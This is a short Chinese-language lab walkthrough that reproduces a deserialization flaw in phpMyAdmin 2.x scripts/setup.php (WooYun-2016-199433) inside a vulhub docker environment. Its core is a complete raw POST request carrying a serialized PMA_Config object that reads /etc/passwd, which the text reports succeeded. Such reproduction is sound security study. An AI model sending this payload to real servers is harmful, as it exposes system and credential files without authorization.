phpmyadmin scriptssetup.php 反序列化漏洞
phpmyadmin scriptssetup.php 反序列化漏洞(WooYun-2016-199433)
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。
漏洞环境
我们先下载环境,在github有别人直接搭建好的docker环境我们直接拿来用即可
git clone git://github.com/vulhub/vulhub.git cd vulhub/phpmyadmin/WooYun-2016-199433/ docker-compose up -d
访问IP:8080即可,因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,我们不用管他就行。
影响版本
phpMyAdmin
2.x
漏洞复现
我们构造URL
POST请求 ip:8080/scripts/setup.php
POST /scripts/setup.php HTTP/1.1 Host: 192.168.200.23:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Cache: no-cache Origin: moz-extension://d2882cd5-38d6-4b0c-9bb9-189722962513 Content-Length: 80 Connection: close Cookie: pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; phpMyAdmin=0de109133be667550d76562dc3e9ec1f; auto_saved_sql_sort= action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
然后发现能访问passwd内容